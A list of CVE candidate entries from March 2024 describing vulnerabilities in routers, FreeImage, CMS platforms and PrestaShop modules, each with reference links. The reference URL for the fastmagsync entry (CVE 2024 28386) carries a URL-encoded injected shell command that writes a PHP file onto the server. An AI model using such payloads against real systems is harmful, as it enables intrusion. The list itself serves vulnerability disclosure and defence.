CVE 2024 2864 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in KaineLabs Youzify - Buddypress Moderation.This issue affects Youzify - Buddypress Moderation: from n/a through 1.2.5. MISC:https://patchstack.com/database/vulnerability/youzify-moderation/wordpress-youzify-buddypress-moderation-plugin-2-0-0-unauthenticated-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/youzify-moderation/wordpress-youzify-buddypress-moderation-plugin-2-0-0-unauthenticated-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240325)
CVE 2024 28639 Candidate Buffer Overflow vulnerability in TOTOLink X5000R V9.1.0u.6118-B20201102 and A7000R V9.1.0u.6115-B20201022, allow remote attackers to execute arbitrary code and cause a denial of service (DoS) via the IP field. MISC:https://github.com/ZIKH26/CVE-information/blob/master/TOTOLINK/Vulnerability%20Information_1.md Assigned (20240308)
CVE 2024 28635 Candidate Cross Site Scripting (XSS) vulnerability in SurveyJS Survey Creator v.1.9.132 and before, allows attackers to execute arbitrary code and obtain sensitive information via the title parameter in form. MISC:https://github.com/surveyjs/survey-creator/issues/5285 | MISC:https://packetstormsecurity.com/2403-exploits/surveyjssurveycreator19132-xss.txt Assigned (20240308)
CVE 2024 2863 Candidate This vulnerability allows remote attackers to traverse paths via file upload on the affected LG LED Assistant. MISC:https://lgsecurity.lge.com/bulletins/idproducts#updateDetails | URL:https://lgsecurity.lge.com/bulletins/idproducts#updateDetails Assigned (20240325)
CVE 2024 28623 Candidate RiteCMS v3.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component main_menu/edit_section. MISC:https://github.com/GURJOTEXPERT/ritecms Assigned (20240308)
CVE 2024 2862 Candidate This vulnerability allows remote attackers to reset the password of anonymous users without authorization on the affected LG LED Assistant. MISC:https://lgsecurity.lge.com/bulletins/idproducts#updateDetails | URL:https://lgsecurity.lge.com/bulletins/idproducts#updateDetails Assigned (20240325)
CVE 2024 28595 Candidate SQL Injection vulnerability in Employee Management System v1.0 allows attackers to run arbitrary SQL commands via the admin_id parameter in update-admin.php. MISC:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-28595.md Assigned (20240308)
CVE 2024 28593 Candidate ** DISPUTED ** The Chat activity in Moodle 4.3.3 allows students to insert a potentially unwanted HTML A element or IMG element, or HTML content that leads to a performance degradation. NOTE: the vendor's Using_Chat page says "If you know some HTML code, you can use it in your text to do things like insert images, play sounds or create different coloured and sized text." This page also says "Chat is due to be removed from standard Moodle." MISC:https://docs.moodle.org/403/en/Using_Chat | MISC:https://gist.githubusercontent.com/minendie/4f23174687bc4d8eb7f727d9959b5399/raw/9ce573cebcce5521d9d6f826ab68f3780036b874/CVE-2024-28593.txt | MISC:https://medium.com/@lamscun/how-do-i-change-htmli-from-low-to-critical-your-email-box-is-safe-e7171efd88fe Assigned (20240308)
CVE 2024 28584 Candidate Null Pointer Dereference vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the J2KImageToFIBITMAP() function when reading images in J2K format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28583 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to execute arbitrary code via the readLine() function when reading images in XPM format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28582 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to execute arbitrary code via the rgbe_RGBEToFloat() function when reading images in HDR format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28581 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to execute arbitrary code via the _assignPixel<>() function when reading images in TARGA format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28580 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to execute arbitrary code via the ReadData() function when reading images in RAS format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28579 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the FreeImage_Unload() function when reading images in HDR format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28578 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to execute arbitrary code via the Load() function when reading images in RAS format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28577 Candidate Null Pointer Dereference vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the jpeg_read_exif_profile_raw() function when reading images in JPEG format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28576 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the opj_j2k_tcp_destroy() function when reading images in J2K format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28575 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the opj_j2k_read_mct() function when reading images in J2K format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28574 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the opj_j2k_copy_default_tcp_and_create_tcd() function when reading images in J2K format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28573 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the jpeg_read_exif_profile() function when reading images in JPEG format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28572 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the FreeImage_SetTagValue() function when reading images in JPEG format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28571 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the fill_input_buffer() function when reading images in JPEG format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28570 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the processMakerNote() function when reading images in JPEG format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28569 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to execute arbitrary code via the Imf_2_2::Xdr::read() function when reading images in EXR format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28568 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the read_iptc_profile() function when reading images in TIFF format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28567 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the FreeImage_CreateICCProfile() function when reading images in TIFF format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28566 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to execute arbitrary code via the AssignPixel() function when reading images in TIFF format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28565 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the psdParser::ReadImageData() function when reading images in PSD format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28564 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the Imf_2_2::CharPtrIO::readChars() function when reading images in EXR format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28563 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to cause a denial of service (DoS) via the Imf_2_2::DwaCompressor::Classifier::Classifier() function when reading images in EXR format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28562 Candidate Buffer Overflow vulnerability in open source FreeImage v.3.19.0 [r1909] allows a local attacker to execute arbitrary code via the Imf_2_2::copyIntoFrameBuffer() component when reading images in EXR format. MISC:https://github.com/Ruanxingzhi/vul-report/tree/master/freeimage-r1909 Assigned (20240308)
CVE 2024 28560 Candidate SQL injection vulnerability in Niushop B2B2C v.5.3.3 and before allows an attacker to escalate privileges via the deleteArea() function of the Address.php component. MISC:https://chiggerlor.substack.com/p/cve-2024-28560-cve-2024-28559 | MISC:https://gitee.com/niushop-team/niushop_b2c_v5 | MISC:https://v5.niuteam.cn | MISC:https://www.niushop.com/ Assigned (20240308)
CVE 2024 2856 Candidate A vulnerability, which was classified as critical, has been found in Tenda AC10 16.03.10.13/16.03.10.20. Affected by this issue is the function fromSetSysTime of the file /goform/SetSysTimeCfg. The manipulation of the argument timeZone leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257780. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:Submit #299741 | Tenda AC10 AC10 v4.0 V16.03.10.13、V16.03.10.20 buffer overflow | URL:https://vuldb.com/?submit.299741 | MISC:VDB-257780 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257780 | MISC:VDB-257780 | Tenda AC10 SetSysTimeCfg fromSetSysTime stack-based overflow | URL:https://vuldb.com/?id.257780 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10/V16.03.10.13/fromSetSysTime.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10/V16.03.10.13/fromSetSysTime.md Assigned (20240323)
CVE 2024 28559 Candidate SQL injection vulnerability in Niushop B2B2C v.5.3.3 and before allows an attacker to escalate privileges via the setPrice() function of the Goodsbatchset.php component. MISC:https://chiggerlor.substack.com/p/cve-2024-28560-cve-2024-28559 | MISC:https://gitee.com/niushop-team/niushop_b2c_v5 | MISC:https://v5.niuteam.cn | MISC:https://v5.niuteam.cn/ | MISC:https://www.niushop.com/ Assigned (20240308)
CVE 2024 28553 Candidate Tenda AC18 V15.03.05.05 has a stack overflow vulnerability in the entrys parameter fromAddressNat function. MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/fromAddressNat_entrys.md Assigned (20240308)
CVE 2024 28550 Candidate Tenda AC18 V15.03.05.05 has a stack overflow vulnerability in the filePath parameter of formExpandDlnaFile function. MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formExpandDlnaFile.md Assigned (20240308)
CVE 2024 2855 Candidate A vulnerability classified as critical was found in Tenda AC15 15.03.05.18/15.03.05.19/15.03.20. Affected by this vulnerability is the function fromSetSysTime of the file /goform/SetSysTimeCfg. The manipulation of the argument time leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257779. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257779 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257779 | MISC:VDB-257779 | Tenda AC15 SetSysTimeCfg fromSetSysTime stack-based overflow | URL:https://vuldb.com/?id.257779 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/fromSetSysTime.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/fromSetSysTime.md Assigned (20240323)
CVE 2024 28547 Candidate Tenda AC18 V15.03.05.05 has a stack overflow vulnerability in the firewallEn parameter of formSetFirewallCfg function. MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formSetFirewallCfg.md Assigned (20240308)
CVE 2024 2854 Candidate A vulnerability classified as critical has been found in Tenda AC18 15.03.05.05. Affected is the function formSetSambaConf of the file /goform/setsambacfg. The manipulation of the argument usbName leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257778 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257778 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257778 | MISC:VDB-257778 | Tenda AC18 setsambacfg formSetSambaConf os command injection | URL:https://vuldb.com/?id.257778 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formSetSambaConf.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formSetSambaConf.md Assigned (20240323)
CVE 2024 28537 Candidate Tenda AC18 V15.03.05.05 has a stack overflow vulnerability in the page parameter of fromNatStaticSetting function. MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/fromNatStaticSetting.md Assigned (20240308)
CVE 2024 28535 Candidate Tenda AC18 V15.03.05.05 has a stack overflow vulnerability in the mitInterface parameter of fromAddressNat function. MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/fromAddressNat_mitInterface.md Assigned (20240308)
CVE 2024 2853 Candidate A vulnerability was found in Tenda AC10U 15.03.06.48/15.03.06.49. It has been rated as critical. This issue affects the function formSetSambaConf of the file /goform/setsambacfg. The manipulation of the argument usbName leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257777 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257777 | MISC:VDB-257777 | Tenda AC10U setsambacfg formSetSambaConf os command injection | URL:https://vuldb.com/?id.257777 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.48/more/formSetSambaConf.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.48/more/formSetSambaConf.md Assigned (20240323)
CVE 2024 28521 Candidate SQL Injection vulnerability in Netcome NS-ASG Application Security Gateway v.6.3.1 allows a local attacker to execute arbitrary code and obtain sensitive information via a crafted script to the loginid parameter of the /singlelogin.php component. MISC:https://github.com/aknbg1thub/cve/blob/main/sql.md Assigned (20240308)
CVE 2024 2852 Candidate A vulnerability was found in Tenda AC15 15.03.20_multi. It has been declared as critical. This vulnerability affects the function saveParentControlInfo of the file /goform/saveParentControlInfo. The manipulation of the argument urls leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257776. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257776 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257776 | MISC:VDB-257776 | Tenda AC15 saveParentControlInfo stack-based overflow | URL:https://vuldb.com/?id.257776 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/saveParentControlInfo_urls.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/saveParentControlInfo_urls.md Assigned (20240323)
CVE 2024 2851 Candidate A vulnerability was found in Tenda AC15 15.03.05.18/15.03.20_multi. It has been classified as critical. This affects the function formSetSambaConf of the file /goform/setsambacfg. The manipulation of the argument usbName leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257775. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257775 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257775 | MISC:VDB-257775 | Tenda AC15 setsambacfg formSetSambaConf os command injection | URL:https://vuldb.com/?id.257775 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/formSetSambaConf.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/formSetSambaConf.md Assigned (20240323)
CVE 2024 2850 Candidate A vulnerability was found in Tenda AC15 15.03.05.18 and classified as critical. Affected by this issue is the function saveParentControlInfo of the file /goform/saveParentControlInfo. The manipulation of the argument urls leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257774 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257774 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257774 | MISC:VDB-257774 | Tenda AC15 saveParentControlInfo stack-based overflow | URL:https://vuldb.com/?id.257774 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/saveParentControlInfo_urls.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/saveParentControlInfo_urls.md Assigned (20240323)
CVE 2024 2849 Candidate A vulnerability classified as critical was found in SourceCodester Simple File Manager 1.0. This vulnerability affects unknown code. The manipulation of the argument photo leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257770 is the identifier assigned to this vulnerability. MISC:Submit #303123 | Sourcecodester Simple File Manager Web App using PHP and MySQL Database Free Source Code v1.0 unrestricted uploads | URL:https://vuldb.com/?submit.303123 | MISC:VDB-257770 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257770 | MISC:VDB-257770 | SourceCodester Simple File Manager unrestricted upload | URL:https://vuldb.com/?id.257770 | MISC:https://github.com/CveSecLook/cve/issues/1 | URL:https://github.com/CveSecLook/cve/issues/1 Assigned (20240322)
CVE 2024 28447 Candidate Shenzhen Libituo Technology Co., Ltd LBT-T300-mini1 v1.2.9 was discovered to contain a buffer overflow via lan_ipaddr parameters at /apply.cgi. MISC:https://github.com/AdamRitz/lbtvul/blob/main/t300mini.md Assigned (20240308)
CVE 2024 28446 Candidate Shenzhen Libituo Technology Co., Ltd LBT-T300-mini1 v1.2.9 was discovered to contain a buffer overflow via lan_netmask parameter at /apply.cgi. MISC:https://github.com/AdamRitz/lbtvul/blob/main/t300mini.md Assigned (20240308)
CVE 2024 28441 Candidate File Upload vulnerability in magicflue v.7.0 and before allows a remote attacker to execute arbitrary code via a crafted request to the messageid parameter of the mail/mailupdate.jsp endpoint. MISC:https://github.com/iamHuFei/HVVault/blob/main/webapp/%E9%AD%94%E6%96%B9%E7%BD%91%E8%A1%A8/magicflu-mailupdate-jsp-fileupload.md Assigned (20240308)
CVE 2024 28435 Candidate The CRM platform Twenty version 0.3.0 is vulnerable to SSRF via file upload. MISC:https://github.com/b-hermes/vulnerability-research/tree/main/CVE-2024-28435 | MISC:https://github.com/twentyhq/twenty Assigned (20240308)
CVE 2024 28434 Candidate The CRM platform Twenty is vulnerable to stored cross site scripting via file upload in version 0.3.0. A crafted svg file can trigger the execution of the javascript code. MISC:https://github.com/b-hermes/vulnerability-research/tree/main/CVE-2024-28434 | MISC:https://github.com/twentyhq/twenty Assigned (20240308)
CVE 2024 28432 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/article_edit.php. MISC:https://github.com/itsqian797/cms/blob/main/4.md Assigned (20240308)
CVE 2024 28431 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/catalog_del.php. MISC:https://github.com/itsqian797/cms/blob/main/3.md Assigned (20240308)
CVE 2024 28430 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/catalog_edit.php. MISC:https://github.com/itsqian797/cms/blob/main/1.md Assigned (20240308)
CVE 2024 28429 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/archives_do.php MISC:https://github.com/itsqian797/cms/blob/main/2.md Assigned (20240308)
CVE 2024 28425 Candidate greykite v1.0.0 was discovered to contain an arbitrary file upload vulnerability in the load_obj function at /templates/pickle_utils.py. This vulnerability allows attackers to execute arbitrary code via uploading a crafted file. MISC:https://github.com/bayuncao/vul-cve-17 Assigned (20240308)
CVE 2024 28424 Candidate zenml v0.55.4 was discovered to contain an arbitrary file upload vulnerability in the load function at /materializers/cloudpickle_materializer.py. This vulnerability allows attackers to execute arbitrary code via uploading a crafted file. MISC:https://github.com/bayuncao/vul-cve-18 Assigned (20240308)
CVE 2024 28423 Candidate Airflow-Diagrams v2.1.0 was discovered to contain an arbitrary file upload vulnerability in the unsafe_load function at cli.py. This vulnerability allows attackers to execute arbitrary code via uploading a crafted YML file. MISC:https://github.com/bayuncao/vul-cve-15 Assigned (20240308)
CVE 2024 28421 Candidate SQL Injection vulnerability in Razor 0.8.0 allows a remote attacker to escalate privileges via the ChannelModel::updateapk method of the channelmodle.php MISC:https://gist.github.com/LioTree/003202727a61c0fb3ec3c948ab5e38f9 | MISC:https://github.com/cobub/razor/issues/178 Assigned (20240308)
CVE 2024 28418 Candidate Webedition CMS 9.2.2.0 has a File upload vulnerability via /webEdition/we_cmd.php MISC:https://gitee.com/shavchen214/pwn/issues/I94VI3 Assigned (20240308)
CVE 2024 28417 Candidate Webedition CMS 9.2.2.0 has a Stored XSS vulnerability via /webEdition/we_cmd.php. MISC:https://gitee.com/shavchen214/pwn/issues/I94VFH Assigned (20240308)
CVE 2024 28404 Candidate TOTOLINK X2000R before V1.0.0-B20231213.1013 contains a Stored Cross-site scripting (XSS) vulnerability in MAC Filtering under the Firewall Page. MISC:https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/X2000R/XSS_3_MAC_Filtering/XSS.md | MISC:https://www.totolink.net/home/menu/detail/menu_listtpl/products/id/242/ids/33.html Assigned (20240308)
CVE 2024 28403 Candidate TOTOLINK X2000R before V1.0.0-B20231213.1013 is vulnerable to Cross Site Scripting (XSS) via the VPN Page. MISC:https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/X2000R/XSS_5_VPN/XSS.md | MISC:https://www.totolink.net/home/menu/detail/menu_listtpl/products/id/242/ids/33.html Assigned (20240308)
CVE 2024 28402 Candidate TOTOLINK X2000R before V1.0.0-B20231213.1013 contains a Stored Cross-site scripting (XSS) vulnerability in IP/Port Filtering under the Firewall Page. MISC:https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/X2000R/XSS_4_IP_Port_Filtering/XSS.md | MISC:https://www.totolink.net/home/menu/detail/menu_listtpl/products/id/242/ids/33.html Assigned (20240308)
CVE 2024 28401 Candidate TOTOLINK X2000R before v1.0.0-B20231213.1013 contains a Store Cross-site scripting (XSS) vulnerability in Root Access Control under the Wireless Page. MISC:https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/X2000R/XSS_1_Root_Access_Control/XSS.md | MISC:https://www.totolink.net/home/menu/detail/menu_listtpl/products/id/242/ids/33.html Assigned (20240308)
CVE 2024 28396 Candidate An issue in MyPrestaModules ordersexport v.6.0.2 and before allows a remote attacker to execute arbitrary code via the download.php component. MISC:https://addons.prestashop.com/en/data-import-export/17596-orders-csv-excel-export-pro.html | MISC:https://security.friendsofpresta.org/modules/2024/03/14/ordersexport.html Assigned (20240308)
CVE 2024 28395 Candidate SQL injection vulnerability in Best-Kit bestkit_popup v.1.7.2 and before allows a remote attacker to escalate privileges via the bestkit_popup.php component. MISC:https://addons.prestashop.com/en/pop-up/20208-pop-up-schedule-popup-splash-window.html | MISC:https://security.friendsofpresta.org/modules/2024/03/14/bestkit_popup.html Assigned (20240308)
CVE 2024 28394 Candidate An issue in Advanced Plugins reportsstatistics v1.3.20 and before allows a remote attacker to execute arbitrary code via the Sales Reports, Statistics, Custom Fields & Export module. MISC:https://addons.prestashop.com/en/customer-administration/28379-sales-reports-statistics-custom-fields-export.html | MISC:https://security.friendsofpresta.org/modules/2024/03/14/reportsstatistics.html Assigned (20240308)
CVE 2024 28393 Candidate SQL injection vulnerability in scalapay v.1.2.41 and before allows a remote attacker to escalate privileges via the ScalapayReturnModuleFrontController::postProcess() method. MISC:https://addons.prestashop.com/fr/paiement-en-plusieurs-fois/87023-scalapay-payez-en-3-fois-sans-frais.html | MISC:https://security.friendsofpresta.org/modules/2024/03/19/scalapay.html Assigned (20240308)
CVE 2024 28392 Candidate SQL injection vulnerability in pscartabandonmentpro v.2.0.11 and before allows a remote attacker to escalate privileges via the pscartabandonmentproFrontCAPUnsubscribeJobModuleFrontController::setEmailVisualized() method. MISC:https://addons.prestashop.com/en/remarketing-shopping-cart-abandonment/16535-abandoned-cart-reminder-pro.html | MISC:https://security.friendsofpresta.org/modules/2024/03/14/pscartabandonmentpro.html Assigned (20240308)
CVE 2024 28391 Candidate SQL injection vulnerability in FME Modules quickproducttable module for PrestaShop v.1.2.1 and before, allows a remote attacker to escalate privileges and obtain information via the readCsv(), displayAjaxProductChangeAttr, displayAjaxProductAddToCart, getSearchProducts, and displayAjaxProductSku methods. MISC:https://security.friendsofpresta.org/modules/2024/03/12/quickproducttable.html Assigned (20240308)
CVE 2024 28390 Candidate An issue in Advanced Plugins ultimateimagetool module for PrestaShop before v.2.2.01, allows a remote attacker to escalate privileges and obtain sensitive information via Improper Access Control. MISC:https://security.friendsofpresta.org/modules/2024/03/12/ultimateimagetool.html Assigned (20240308)
CVE 2024 28389 Candidate SQL injection vulnerability in KnowBand spinwheel v.3.0.3 and before allows a remote attacker to gain escalated privileges and obtain sensitive information via the SpinWheelFrameSpinWheelModuleFrontController::sendEmail() method. MISC:https://security.friendsofpresta.org/modules/2024/03/12/spinwheel.html Assigned (20240308)
CVE 2024 28388 Candidate SQL injection vulnerability in SunnyToo stproductcomments module for PrestaShop v.1.0.5 and before, allows a remote attacker to escalate privileges and obtain sensitive information via the StProductCommentClass::getListcomments method. MISC:https://security.friendsofpresta.org/modules/2024/03/12/stproductcomments.html Assigned (20240308)
CVE 2024 28387 Candidate An issue in axonaut v.3.1.23 and before allows a remote attacker to obtain sensitive information via the log.txt component. MISC:https://axonaut.com/integration/detail/prestashop | MISC:https://security.friendsofpresta.org/modules/2024/03/19/axonaut.html Assigned (20240308)
CVE 2024 28386 Candidate An issue in Home-Made.io fastmagsync v.1.7.51 and before allows a remote attacker to execute arbitrary code via the getPhpBin() component. MISC:http://fastmagsync.com | MISC:http://home-madeio.com | MISC:https://reference1.example.com/modules/fastmagsync/crons/cron_mutualise_job_queue.php?hosting=.%20%26%20%20echo%20%27%3C%3Fphp%20echo%20%2242ovh%22%3B%27%20%3E%20a.php%3B%23&syncway=tofastmag | MISC:https://security.friendsofpresta.org/modules/2024/03/19/fastmagsync.html | MISC:https://www.home-made.io/module-fastmag-sync-prestashop/ Assigned (20240308)
CVE 2024 28383 Candidate Tenda AX12 v1.0 v22.03.01.16 was discovered to contain a stack overflow via the ssid parameter in the sub_431CF0 function. MISC:https://github.com/cvdyfbwa/IoT-Tenda-Router/blob/main/sub_431CF0.md Assigned (20240308)
CVE 2024 28354 Candidate There is a command injection vulnerability in the TRENDnet TEW-827DRU router with firmware version 2.10B01. An attacker can inject commands into the post request parameters usapps.@smb[%d].username in the apply.cgi interface, thereby gaining root shell privileges. MISC:https://warp-desk-89d.notion.site/TEW-827DRU-c732df50b2454ecaa5451b02f3adda6a Assigned (20240308)
CVE 2024 28353 Candidate There is a command injection vulnerability in the TRENDnet TEW-827DRU router with firmware version 2.10B01. An attacker can inject commands into the post request parameters usapps.config.smb_admin_name in the apply.cgi interface, thereby gaining root shell privileges. MISC:https://warp-desk-89d.notion.site/TEW-827DRU-5c40fb20572148f0b00f329d69273791 Assigned (20240308)
CVE 2024 28340 Candidate An information leak in the currentsetting.htm component of Netgear CBR40 2.5.0.28, Netgear CBK40 2.5.0.28, and Netgear CBK43 2.5.0.28 allows attackers to obtain sensitive information without any authentication required. MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/Netgear%20CBR40%5CCBK40%5CCBK43/Info%20Leak%20in%20Netgear-CBR40%E3%80%81CBK40%E3%80%81CBK43%20Router%EF%BC%88currentsetting.htm%EF%BC%89.md | MISC:https://www.netgear.com/about/security/ Assigned (20240308)
CVE 2024 28339 Candidate An information leak in the debuginfo.htm component of Netgear CBR40 2.5.0.28, Netgear CBK40 2.5.0.28, and Netgear CBK43 2.5.0.28 allows attackers to obtain sensitive information without any authentication required. MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/Netgear%20CBR40%5CCBK40%5CCBK43/Info%20Leak%20in%20Netgear-CBR40%E3%80%81CBK40%E3%80%81CBK43%20Router%EF%BC%88debuginfo.htm%EF%BC%89.md | MISC:https://www.netgear.com/about/security/ Assigned (20240308)
